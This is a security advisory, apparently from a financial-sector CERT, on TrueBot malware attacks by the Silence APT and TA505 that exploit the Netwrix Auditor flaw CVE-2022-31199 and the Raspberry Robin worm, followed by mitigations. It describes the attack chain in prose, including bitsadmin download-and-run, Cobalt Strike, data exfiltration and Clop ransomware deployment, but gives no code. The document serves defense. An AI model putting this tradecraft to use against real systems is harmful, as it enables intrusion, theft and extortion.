TrueBot Malware 11 December 2022

296/2022
High
December 11, 2022
11:53 am

Silence APT group targets financial institutions in several countries around the world through delivering TrueBot malware which leveraging of Netwrix Auditor critical RCE Bug and Raspberry Robin worm.

TrueBot was first identified in 2017 as downloader malware, the main goal is to infect systems, collect information to help triage interesting targets, and deploy additional payloads.

Security Researchers observed an increase in TrueBot infections and have linked it to threat actors called Silence APT Group and TA505 Group, the operations of these actors have moved from using malicious emails to alternative delivery methods such as the exploitation of a remote code execution flaw (CVE-2022-31199) in Netwrix auditor as well as the Raspberry Robin worm.

Tactics and Techniques:

Silence APT had performed suspicious commands executed on the Netwrix auditor by a process named UAVRServer.exe, this process triggered the execution of bitsadmin.exe to download and execute TrueBot malware.
Security researchers observed a higher number of systems infected with Raspberry Robin worm via infected USB drives then delivered TrueBot malware by downloading Truebot.dll file and executing it using rundll32.exe.
TrueBot deploys additional payloads such as Cobalt Strike, Grace malware to collect information and send it to the attacker’s command and control (C2).
TrueBot delivered Teleport (custom data exfiltration tool built in C++) which contains several features that make the process of data exfiltration easier and stealthier.
Once sufficient data had been collected, the attackers created scheduled tasks on a large number of systems to simultaneously start executing the Clop ransomware and encrypt the highest possible volume of data.

Indicators of Compromise

Indicators of compromise will be shared with EG-FinCIRT’s Constituents

Vulnerabilities

CVE-2022-31199

Mitigations

Search for existing signs of the indicated IOCs in your environment.
Block IOCs at the organization’s security devices.
Enable machine learning, active adversary mitigations, and behavioral detection in endpoint security.
Develop and implement a patching policy and baseline configuration standards for the operating system.
Conduct cybersecurity awareness training to End- users.
Ensure anti-virus software and associated files are up to date.
Implement application whitelisting, which only allows systems to execute programs known and permitted by the organization’s security policy.
Update Netwrix Auditor to version 10.5 to fix the mentioned vulnerability.
Backup your data using different backup destinations including Tape drives.

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Indicators of Compromise

Vulnerabilities

Mitigations

References